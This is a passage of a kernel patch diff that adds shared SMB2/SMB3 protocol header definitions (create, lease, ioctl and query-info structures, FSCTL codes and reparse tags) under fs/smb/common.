++#define SMB2_CREATE_APP_INSTANCE_VERSION "\xB9\x82\xD0\xB7\x3B\x56\x07\x4F\xA0\x7B\x52\x4A\x81\x16\xA0\x10"
++#define SVHDX_OPEN_DEVICE_CONTEXT	"\x9C\xCB\xCF\x9E\x04\xC1\xE6\x43\x98\x0E\x15\x8D\xA1\xF6\xEC\x83"
++#define SMB2_CREATE_TAG_AAPL			"AAPL"
++
++/* Flag (SMB3 open response) values */
++#define SMB2_CREATE_FLAG_REPARSEPOINT 0x01
++
++struct create_context {
++	__le32 Next;
++	__le16 NameOffset;
++	__le16 NameLength;
++	__le16 Reserved;
++	__le16 DataOffset;
++	__le32 DataLength;
++	__u8 Buffer[];
++} __packed;
++
++struct smb2_create_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 57 */
++	__u8   SecurityFlags;
++	__u8   RequestedOplockLevel;
++	__le32 ImpersonationLevel;
++	__le64 SmbCreateFlags;
++	__le64 Reserved;
++	__le32 DesiredAccess;
++	__le32 FileAttributes;
++	__le32 ShareAccess;
++	__le32 CreateDisposition;
++	__le32 CreateOptions;
++	__le16 NameOffset;
++	__le16 NameLength;
++	__le32 CreateContextsOffset;
++	__le32 CreateContextsLength;
++	__u8   Buffer[];
++} __packed;
++
++struct smb2_create_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 89 */
++	__u8   OplockLevel;
++	__u8   Flags;  /* 0x01 if reparse point */
++	__le32 CreateAction;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;
++	__le64 EndofFile;
++	__le32 FileAttributes;
++	__le32 Reserved2;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 CreateContextsOffset;
++	__le32 CreateContextsLength;
++	__u8   Buffer[1];
++} __packed;
++
++struct create_posix {
++	struct create_context ccontext;
++	__u8    Name[16];
++	__le32  Mode;
++	__u32   Reserved;
++} __packed;
++
++#define SMB2_LEASE_NONE_LE			cpu_to_le32(0x00)
++#define SMB2_LEASE_READ_CACHING_LE		cpu_to_le32(0x01)
++#define SMB2_LEASE_HANDLE_CACHING_LE		cpu_to_le32(0x02)
++#define SMB2_LEASE_WRITE_CACHING_LE		cpu_to_le32(0x04)
++
++#define SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE	cpu_to_le32(0x02)
++
++#define SMB2_LEASE_KEY_SIZE			16
++
++struct lease_context {
++	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
++	__le32 LeaseState;
++	__le32 LeaseFlags;
++	__le64 LeaseDuration;
++} __packed;
++
++struct lease_context_v2 {
++	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
++	__le32 LeaseState;
++	__le32 LeaseFlags;
++	__le64 LeaseDuration;
++	__u8 ParentLeaseKey[SMB2_LEASE_KEY_SIZE];
++	__le16 Epoch;
++	__le16 Reserved;
++} __packed;
++
++struct create_lease {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct lease_context lcontext;
++} __packed;
++
++struct create_lease_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct lease_context_v2 lcontext;
++	__u8   Pad[4];
++} __packed;
++
++/* See MS-SMB2 2.2.31 and 2.2.32 */
++struct smb2_ioctl_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 57 */
++	__le16 Reserved; /* offset from start of SMB2 header to write data */
++	__le32 CtlCode;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 InputOffset; /* Reserved MBZ */
++	__le32 InputCount;
++	__le32 MaxInputResponse;
++	__le32 OutputOffset;
++	__le32 OutputCount;
++	__le32 MaxOutputResponse;
++	__le32 Flags;
++	__le32 Reserved2;
++	__u8   Buffer[];
++} __packed;
++
++struct smb2_ioctl_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 49 */
++	__le16 Reserved;
++	__le32 CtlCode;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 InputOffset; /* Reserved MBZ */
++	__le32 InputCount;
++	__le32 OutputOffset;
++	__le32 OutputCount;
++	__le32 Flags;
++	__le32 Reserved2;
++	__u8   Buffer[];
++} __packed;
++
++/* this goes in the ioctl buffer when doing FSCTL_SET_ZERO_DATA */
++struct file_zero_data_information {
++	__le64	FileOffset;
++	__le64	BeyondFinalZero;
++} __packed;
++
++/* See MS-FSCC 2.3.7 */
++struct duplicate_extents_to_file {
++	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
++	__u64 VolatileFileHandle;
++	__le64 SourceFileOffset;
++	__le64 TargetFileOffset;
++	__le64 ByteCount;  /* Bytes to be copied */
++} __packed;
++
++/* See MS-FSCC 2.3.8 */
++#define DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC	0x00000001
++struct duplicate_extents_to_file_ex {
++	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
++	__u64 VolatileFileHandle;
++	__le64 SourceFileOffset;
++	__le64 TargetFileOffset;
++	__le64 ByteCount;  /* Bytes to be copied */
++	__le32 Flags;
++	__le32 Reserved;
++} __packed;
++
++
++/* See MS-FSCC 2.3.20 */
++struct fsctl_get_integrity_information_rsp {
++	__le16	ChecksumAlgorithm;
++	__le16	Reserved;
++	__le32	Flags;
++	__le32	ChecksumChunkSizeInBytes;
++	__le32	ClusterSizeInBytes;
++} __packed;
++
++/* See MS-FSCC 2.3.55 */
++struct fsctl_query_file_regions_req {
++	__le64	FileOffset;
++	__le64	Length;
++	__le32	DesiredUsage;
++	__le32	Reserved;
++} __packed;
++
++/* DesiredUsage flags see MS-FSCC 2.3.56.1 */
++#define FILE_USAGE_INVALID_RANGE	0x00000000
++#define FILE_USAGE_VALID_CACHED_DATA	0x00000001
++#define FILE_USAGE_NONCACHED_DATA	0x00000002
++
++struct file_region_info {
++	__le64	FileOffset;
++	__le64	Length;
++	__le32	DesiredUsage;
++	__le32	Reserved;
++} __packed;
++
++/* See MS-FSCC 2.3.56 */
++struct fsctl_query_file_region_rsp {
++	__le32 Flags;
++	__le32 TotalRegionEntryCount;
++	__le32 RegionEntryCount;
++	__u32  Reserved;
++	struct  file_region_info Regions[];
++} __packed;
++
++/* See MS-FSCC 2.3.58 */
++struct fsctl_query_on_disk_vol_info_rsp {
++	__le64	DirectoryCount;
++	__le64	FileCount;
++	__le16	FsFormatMajVersion;
++	__le16	FsFormatMinVersion;
++	__u8	FsFormatName[24];
++	__le64	FormatTime;
++	__le64	LastUpdateTime;
++	__u8	CopyrightInfo[68];
++	__u8	AbstractInfo[68];
++	__u8	FormatImplInfo[68];
++	__u8	LastModifyImplInfo[68];
++} __packed;
++
++/* See MS-FSCC 2.3.73 */
++struct fsctl_set_integrity_information_req {
++	__le16	ChecksumAlgorithm;
++	__le16	Reserved;
++	__le32	Flags;
++} __packed;
++
++/* See MS-FSCC 2.3.75 */
++struct fsctl_set_integrity_info_ex_req {
++	__u8	EnableIntegrity;
++	__u8	KeepState;
++	__u16	Reserved;
++	__le32	Flags;
++	__u8	Version;
++	__u8	Reserved2[7];
++} __packed;
++
++/* Integrity ChecksumAlgorithm choices for above */
++#define	CHECKSUM_TYPE_NONE	0x0000
++#define	CHECKSUM_TYPE_CRC64	0x0002
++#define	CHECKSUM_TYPE_UNCHANGED	0xFFFF	/* set only */
++
++/* Integrity flags for above */
++#define FSCTL_INTEGRITY_FLAG_CHECKSUM_ENFORCEMENT_OFF	0x00000001
++
++/* Reparse structures - see MS-FSCC 2.1.2 */
++
++/* struct fsctl_reparse_info_req is empty, only response structs (see below) */
++struct reparse_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__u8	DataBuffer[]; /* Variable Length */
++} __packed;
++
++struct reparse_guid_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__u8	ReparseGuid[16];
++	__u8	DataBuffer[]; /* Variable Length */
++} __packed;
++
++struct reparse_mount_point_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le16	SubstituteNameOffset;
++	__le16	SubstituteNameLength;
++	__le16	PrintNameOffset;
++	__le16	PrintNameLength;
++	__u8	PathBuffer[]; /* Variable Length */
++} __packed;
++
++#define SYMLINK_FLAG_RELATIVE 0x00000001
++
++struct reparse_symlink_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le16	SubstituteNameOffset;
++	__le16	SubstituteNameLength;
++	__le16	PrintNameOffset;
++	__le16	PrintNameLength;
++	__le32	Flags;
++	__u8	PathBuffer[]; /* Variable Length */
++} __packed;
++
++/* See MS-FSCC 2.1.2.6 and cifspdu.h for struct reparse_posix_data */
++
++struct validate_negotiate_info_req {
++	__le32 Capabilities;
++	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
++	__le16 SecurityMode;
++	__le16 DialectCount;
++	__le16 Dialects[4]; /* BB expand this if autonegotiate > 4 dialects */
++} __packed;
++
++struct validate_negotiate_info_rsp {
++	__le32 Capabilities;
++	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
++	__le16 SecurityMode;
++	__le16 Dialect; /* Dialect in use for the connection */
++} __packed;
++
++
++/* Possible InfoType values */
++#define SMB2_O_INFO_FILE	0x01
++#define SMB2_O_INFO_FILESYSTEM	0x02
++#define SMB2_O_INFO_SECURITY	0x03
++#define SMB2_O_INFO_QUOTA	0x04
++
++/* SMB2 Query Info see MS-SMB2 (2.2.37) or MS-DTYP */
++
++/* List of QUERY INFO levels (those also valid for QUERY_DIR are noted below */
++#define FILE_DIRECTORY_INFORMATION	1	/* also for QUERY_DIR */
++#define FILE_FULL_DIRECTORY_INFORMATION 2	/* also for QUERY_DIR */
++#define FILE_BOTH_DIRECTORY_INFORMATION 3	/* also for QUERY_DIR */
++#define FILE_BASIC_INFORMATION		4
++#define FILE_STANDARD_INFORMATION	5
++#define FILE_INTERNAL_INFORMATION	6
++#define FILE_EA_INFORMATION	        7
++#define FILE_ACCESS_INFORMATION		8
++#define FILE_NAME_INFORMATION		9
++#define FILE_RENAME_INFORMATION		10
++#define FILE_LINK_INFORMATION		11
++#define FILE_NAMES_INFORMATION		12	/* also for QUERY_DIR */
++#define FILE_DISPOSITION_INFORMATION	13
++#define FILE_POSITION_INFORMATION	14
++#define FILE_FULL_EA_INFORMATION	15
++#define FILE_MODE_INFORMATION		16
++#define FILE_ALIGNMENT_INFORMATION	17
++#define FILE_ALL_INFORMATION		18
++#define FILE_ALLOCATION_INFORMATION	19
++#define FILE_END_OF_FILE_INFORMATION	20
++#define FILE_ALTERNATE_NAME_INFORMATION 21
++#define FILE_STREAM_INFORMATION		22
++#define FILE_PIPE_INFORMATION		23
++#define FILE_PIPE_LOCAL_INFORMATION	24
++#define FILE_PIPE_REMOTE_INFORMATION	25
++#define FILE_MAILSLOT_QUERY_INFORMATION 26
++#define FILE_MAILSLOT_SET_INFORMATION	27
++#define FILE_COMPRESSION_INFORMATION	28
++#define FILE_OBJECT_ID_INFORMATION	29
++/* Number 30 not defined in documents */
++#define FILE_MOVE_CLUSTER_INFORMATION	31
++#define FILE_QUOTA_INFORMATION		32
++#define FILE_REPARSE_POINT_INFORMATION	33
++#define FILE_NETWORK_OPEN_INFORMATION	34
++#define FILE_ATTRIBUTE_TAG_INFORMATION	35
++#define FILE_TRACKING_INFORMATION	36
++#define FILEID_BOTH_DIRECTORY_INFORMATION 37	/* also for QUERY_DIR */
++#define FILEID_FULL_DIRECTORY_INFORMATION 38	/* also for QUERY_DIR */
++#define FILE_VALID_DATA_LENGTH_INFORMATION 39
++#define FILE_SHORT_NAME_INFORMATION	40
++#define FILE_SFIO_RESERVE_INFORMATION	44
++#define FILE_SFIO_VOLUME_INFORMATION	45
++#define FILE_HARD_LINK_INFORMATION	46
++#define FILE_NORMALIZED_NAME_INFORMATION 48
++#define FILEID_GLOBAL_TX_DIRECTORY_INFORMATION 50
++#define FILE_STANDARD_LINK_INFORMATION	54
++#define FILE_ID_INFORMATION		59
++#define FILE_ID_EXTD_DIRECTORY_INFORMATION 60	/* also for QUERY_DIR */
++/* Used for Query Info and Find File POSIX Info for SMB3.1.1 and SMB1 */
++#define SMB_FIND_FILE_POSIX_INFO	0x064
++
++/* Security info type additionalinfo flags. */
++#define OWNER_SECINFO   0x00000001
++#define GROUP_SECINFO   0x00000002
++#define DACL_SECINFO   0x00000004
++#define SACL_SECINFO   0x00000008
++#define LABEL_SECINFO   0x00000010
++#define ATTRIBUTE_SECINFO   0x00000020
++#define SCOPE_SECINFO   0x00000040
++#define BACKUP_SECINFO   0x00010000
++#define UNPROTECTED_SACL_SECINFO   0x10000000
++#define UNPROTECTED_DACL_SECINFO   0x20000000
++#define PROTECTED_SACL_SECINFO   0x40000000
++#define PROTECTED_DACL_SECINFO   0x80000000
++
++/* Flags used for FileFullEAinfo */
++#define SL_RESTART_SCAN		0x00000001
++#define SL_RETURN_SINGLE_ENTRY	0x00000002
++#define SL_INDEX_SPECIFIED	0x00000004
++
++struct smb2_query_info_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 41 */
++	__u8   InfoType;
++	__u8   FileInfoClass;
++	__le32 OutputBufferLength;
++	__le16 InputBufferOffset;
++	__u16  Reserved;
++	__le32 InputBufferLength;
++	__le32 AdditionalInformation;
++	__le32 Flags;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_query_info_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 9 */
++	__le16 OutputBufferOffset;
++	__le32 OutputBufferLength;
++	__u8   Buffer[1];
++} __packed;
++
++/*
++ *	PDU query infolevel structure definitions
++ */
++
++/* See MS-FSCC 2.3.52 */
++struct file_allocated_range_buffer {
++	__le64	file_offset;
++	__le64	length;
++} __packed;
++
++struct smb2_file_internal_info {
++	__le64 IndexNumber;
++} __packed; /* level 6 Query */
++
++struct smb2_file_rename_info { /* encoding of request for level 10 */
++	__u8   ReplaceIfExists; /* 1 = replace existing target with new */
++				/* 0 = fail if target already exists */
++	__u8   Reserved[7];
++	__u64  RootDirectory;  /* MBZ for network operations (why says spec?) */
++	__le32 FileNameLength;
++	char   FileName[];     /* New name to be assigned */
++	/* padding - overall struct size must be >= 24 so filename + pad >= 6 */
++} __packed; /* level 10 Set */
++
++struct smb2_file_link_info { /* encoding of request for level 11 */
++	__u8   ReplaceIfExists; /* 1 = replace existing link with new */
++				/* 0 = fail if link already exists */
++	__u8   Reserved[7];
++	__u64  RootDirectory;  /* MBZ for network operations (why says spec?) */
++	__le32 FileNameLength;
++	char   FileName[];     /* Name to be assigned to new link */
++} __packed; /* level 11 Set */
++
++/*
++ * This level 18, although with struct with same name is different from cifs
++ * level 0x107. Level 0x107 has an extra u64 between AccessFlags and
++ * CurrentByteOffset.
++ */
++struct smb2_file_all_info { /* data block encoding of response to level 18 */
++	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32  Pad1;		/* End of FILE_BASIC_INFO_INFO equivalent */
++	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
++	__le64 EndOfFile;	/* size ie offset to first free byte in file */
++	__le32 NumberOfLinks;	/* hard links */
++	__u8   DeletePending;
++	__u8   Directory;
++	__u16  Pad2;		/* End of FILE_STANDARD_INFO equivalent */
++	__le64 IndexNumber;
++	__le32 EASize;
++	__le32 AccessFlags;
++	__le64 CurrentByteOffset;
++	__le32 Mode;
++	__le32 AlignmentRequirement;
++	__le32 FileNameLength;
++	char   FileName[1];
++} __packed; /* level 18 Query */
++
++struct smb2_file_eof_info { /* encoding of request for level 10 */
++	__le64 EndOfFile; /* new end of file value */
++} __packed; /* level 20 Set */
++
++/* Level 100 query info */
++struct smb311_posix_qinfo {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 DosAttributes;
++	__le64 Inode;
++	__le32 DeviceId;
++	__le32 Zero;
++	/* beginning of POSIX Create Context Response */
++	__le32 HardLinks;
++	__le32 ReparseTag;
++	__le32 Mode;
++	u8     Sids[];
++	/*
++	 * var sized owner SID
++	 * var sized group SID
++	 * le32 filenamelength
++	 * u8  filename[]
++	 */
++} __packed;
++
++/* File System Information Classes */
++#define FS_VOLUME_INFORMATION		1 /* Query */
++#define FS_LABEL_INFORMATION		2 /* Set */
++#define FS_SIZE_INFORMATION		3 /* Query */
++#define FS_DEVICE_INFORMATION		4 /* Query */
++#define FS_ATTRIBUTE_INFORMATION	5 /* Query */
++#define FS_CONTROL_INFORMATION		6 /* Query, Set */
++#define FS_FULL_SIZE_INFORMATION	7 /* Query */
++#define FS_OBJECT_ID_INFORMATION	8 /* Query, Set */
++#define FS_DRIVER_PATH_INFORMATION	9 /* Query */
++#define FS_SECTOR_SIZE_INFORMATION	11 /* SMB3 or later. Query */
++#define FS_POSIX_INFORMATION		100 /* SMB3.1.1 POSIX. Query */
++
++struct smb2_fs_full_size_info {
++	__le64 TotalAllocationUnits;
++	__le64 CallerAvailableAllocationUnits;
++	__le64 ActualAvailableAllocationUnits;
++	__le32 SectorsPerAllocationUnit;
++	__le32 BytesPerSector;
++} __packed;
++
++#define SSINFO_FLAGS_ALIGNED_DEVICE		0x00000001
++#define SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE 0x00000002
++#define SSINFO_FLAGS_NO_SEEK_PENALTY		0x00000004
++#define SSINFO_FLAGS_TRIM_ENABLED		0x00000008
++
++/* sector size info struct */
++struct smb3_fs_ss_info {
++	__le32 LogicalBytesPerSector;
++	__le32 PhysicalBytesPerSectorForAtomicity;
++	__le32 PhysicalBytesPerSectorForPerf;
++	__le32 FSEffPhysicalBytesPerSectorForAtomicity;
++	__le32 Flags;
++	__le32 ByteOffsetForSectorAlignment;
++	__le32 ByteOffsetForPartitionAlignment;
++} __packed;
++
++/* File System Control Information */
++struct smb2_fs_control_info {
++	__le64 FreeSpaceStartFiltering;
++	__le64 FreeSpaceThreshold;
++	__le64 FreeSpaceStopFiltering;
++	__le64 DefaultQuotaThreshold;
++	__le64 DefaultQuotaLimit;
++	__le32 FileSystemControlFlags;
++	__le32 Padding;
++} __packed;
++
++/* volume info struct - see MS-FSCC 2.5.9 */
++#define MAX_VOL_LABEL_LEN	32
++struct smb3_fs_vol_info {
++	__le64	VolumeCreationTime;
++	__u32	VolumeSerialNumber;
++	__le32	VolumeLabelLength; /* includes trailing null */
++	__u8	SupportsObjects; /* True if eg like NTFS, supports objects */
++	__u8	Reserved;
++	__u8	VolumeLabel[]; /* variable len */
++} __packed;
++
++/* See MS-SMB2 2.2.23 through 2.2.25 */
++struct smb2_oplock_break {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 24 */
++	__u8   OplockLevel;
++	__u8   Reserved;
++	__le32 Reserved2;
++	__u64  PersistentFid;
++	__u64  VolatileFid;
++} __packed;
++
++#define SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED cpu_to_le32(0x01)
++
++struct smb2_lease_break {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 44 */
++	__le16 Epoch;
++	__le32 Flags;
++	__u8   LeaseKey[16];
++	__le32 CurrentLeaseState;
++	__le32 NewLeaseState;
++	__le32 BreakReason;
++	__le32 AccessMaskHint;
++	__le32 ShareMaskHint;
++} __packed;
++
++struct smb2_lease_ack {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 36 */
++	__le16 Reserved;
++	__le32 Flags;
++	__u8   LeaseKey[16];
++	__le32 LeaseState;
++	__le64 LeaseDuration;
++} __packed;
++
++#define OP_BREAK_STRUCT_SIZE_20		24
++#define OP_BREAK_STRUCT_SIZE_21		36
++#endif				/* _COMMON_SMB2PDU_H */
+diff --git a/fs/smb/common/smbfsctl.h b/fs/smb/common/smbfsctl.h
+new file mode 100644
+index 0000000000000..edd7fc2a7921b
+--- /dev/null
++++ b/fs/smb/common/smbfsctl.h
+@@ -0,0 +1,170 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   SMB, CIFS, SMB2 FSCTL definitions
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2013
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++/* IOCTL information */
++/*
++ * List of ioctl/fsctl function codes that are or could be useful in the
++ * future to remote clients like cifs or SMB2/SMB3 client.  This is probably
++ * a slightly larger set of fsctls that NTFS local filesystem could handle,
++ * including the seven below that we do not have struct definitions for.
++ * Even with protocol definitions for most of these now available, we still
++ * need to do some experimentation to identify which are practical to do
++ * remotely.  Some of the following, such as the encryption/compression ones
++ * could be invoked from tools via a specialized hook into the VFS rather
++ * than via the standard vfs entry points
++ *
++ * See MS-SMB2 Section 2.2.31 (last checked September 2021, all of that list are
++ * below). Additional detail on less common ones can be found in MS-FSCC
++ * section 2.3.
++ */
++
++#ifndef __SMBFSCTL_H
++#define __SMBFSCTL_H
++
++/*
++ * FSCTL values are 32 bits and are constructed as
++ * <device 16bits> <access 2bits> <function 12bits> <method 2bits>
++ */
++/* Device */
++#define FSCTL_DEVICE_DFS                 (0x0006 << 16)
++#define FSCTL_DEVICE_FILE_SYSTEM         (0x0009 << 16)
++#define FSCTL_DEVICE_NAMED_PIPE          (0x0011 << 16)
++#define FSCTL_DEVICE_NETWORK_FILE_SYSTEM (0x0014 << 16)
++#define FSCTL_DEVICE_MASK                0xffff0000
++/* Access */
++#define FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS        (0x00 << 14)
++#define FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS       (0x01 << 14)
++#define FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS      (0x02 << 14)
++#define FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS (0x03 << 14)
++#define FSCTL_DEVICE_ACCESS_MASK                   0x0000c000
++/* Function */
++#define FSCTL_DEVICE_FUNCTION_MASK       0x00003ffc
++/* Method */
++#define FSCTL_DEVICE_METHOD_BUFFERED   0x00
++#define FSCTL_DEVICE_METHOD_IN_DIRECT  0x01
++#define FSCTL_DEVICE_METHOD_OUT_DIRECT 0x02
++#define FSCTL_DEVICE_METHOD_NEITHER    0x03
++#define FSCTL_DEVICE_METHOD_MASK       0x00000003
++
++
++#define FSCTL_DFS_GET_REFERRALS      0x00060194
++#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
++#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
++#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
++#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
++#define FSCTL_LOCK_VOLUME            0x00090018
++#define FSCTL_UNLOCK_VOLUME          0x0009001C
++#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
++#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
++#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
++#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
++/* Verify the next FSCTL number, we had it as 0x00090090 before */
++#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
++#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
++#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
++#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
++#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
++#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
++#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
++#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
++#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
++#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
++#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
++#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
++#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
++#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
++#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
++#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
++#define FSCTL_SET_ZERO_DATA          0x000980C8
++#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
++#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
++#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
++#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
++#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
++#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
++#define FSCTL_MARK_HANDLE	     0x000900FC /* BB add struct */
++#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
++#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
++#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
++#define FSCTL_QUERY_ON_DISK_VOLUME_INFO 0x0009013C
++#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
++#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
++#define FSCTL_GET_INTEGRITY_INFORMATION 0x0009027C
++#define FSCTL_QUERY_FILE_REGIONS     0x00090284
++#define FSCTL_GET_REFS_VOLUME_DATA   0x000902D8 /* See MS-FSCC 2.3.24 */
++#define FSCTL_SET_INTEGRITY_INFORMATION_EXT 0x00090380
++#define FSCTL_GET_RETRIEVAL_POINTERS_AND_REFCOUNT 0x000903d3
++#define FSCTL_GET_RETRIEVAL_POINTER_COUNT 0x0009042b
++#define FSCTL_REFS_STREAM_SNAPSHOT_MANAGEMENT 0x00090440
++#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF
++#define FSCTL_OFFLOAD_READ	0x00094264 /* BB add struct */
++#define FSCTL_OFFLOAD_WRITE	0x00098268 /* BB add struct */
++#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
++#define FSCTL_FILE_LEVEL_TRIM        0x00098208 /* BB add struct */
++#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
++#define FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX 0x000983E8
++#define FSCTL_SIS_LINK_FILES         0x0009C104
++#define FSCTL_SET_INTEGRITY_INFORMATION 0x0009C280
++#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
++#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
++/* strange that the number for this op is not sequential with previous op */
++#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
++/* Enumerate previous versions of a file */
++#define FSCTL_SRV_ENUMERATE_SNAPSHOTS 0x00144064
++/* Retrieve an opaque file reference for server-side data movement ie copy */
++#define FSCTL_SRV_REQUEST_RESUME_KEY 0x00140078
++#define FSCTL_LMR_REQUEST_RESILIENCY 0x001401D4
++#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
++#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
++#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
++/* Perform server-side data movement */
++#define FSCTL_SRV_COPYCHUNK 0x001440F2
++#define FSCTL_SRV_COPYCHUNK_WRITE 0x001480F2
++#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC /* BB add struct */
++#define FSCTL_SRV_READ_HASH          0x001441BB /* BB add struct */
++
++/* See FSCC 2.1.2.5 */
++#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
++#define IO_REPARSE_TAG_HSM           0xC0000004
++#define IO_REPARSE_TAG_SIS           0x80000007
++#define IO_REPARSE_TAG_HSM2          0x80000006
++#define IO_REPARSE_TAG_DRIVER_EXTENDER 0x80000005
++/* Used by the DFS filter. See MS-DFSC */
++#define IO_REPARSE_TAG_DFS           0x8000000A
++/* Used by the DFS filter See MS-DFSC */
++#define IO_REPARSE_TAG_DFSR          0x80000012
++#define IO_REPARSE_TAG_FILTER_MANAGER 0x8000000B
++/* See section MS-FSCC 2.1.2.4 */
++#define IO_REPARSE_TAG_SYMLINK       0xA000000C
++#define IO_REPARSE_TAG_DEDUP         0x80000013
++#define IO_REPARSE_APPXSTREAM	     0xC0000014
++/* NFS symlinks, Win 8/SMB3 and later */
++#define IO_REPARSE_TAG_NFS           0x80000014
++/*
++ * AzureFileSync - see
++ * https://docs.microsoft.com/en-us/azure/storage/files/storage-sync-cloud-tiering
++ */
++#define IO_REPARSE_TAG_AZ_FILE_SYNC  0x8000001e
++/* WSL reparse tags */
++#define IO_REPARSE_TAG_LX_SYMLINK    0xA000001D
++#define IO_REPARSE_TAG_AF_UNIX	     0x80000023
++#define IO_REPARSE_TAG_LX_FIFO	     0x80000024
++#define IO_REPARSE_TAG_LX_CHR	     0x80000025
++#define IO_REPARSE_TAG_LX_BLK	     0x80000026
++
++#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
++#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
++#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
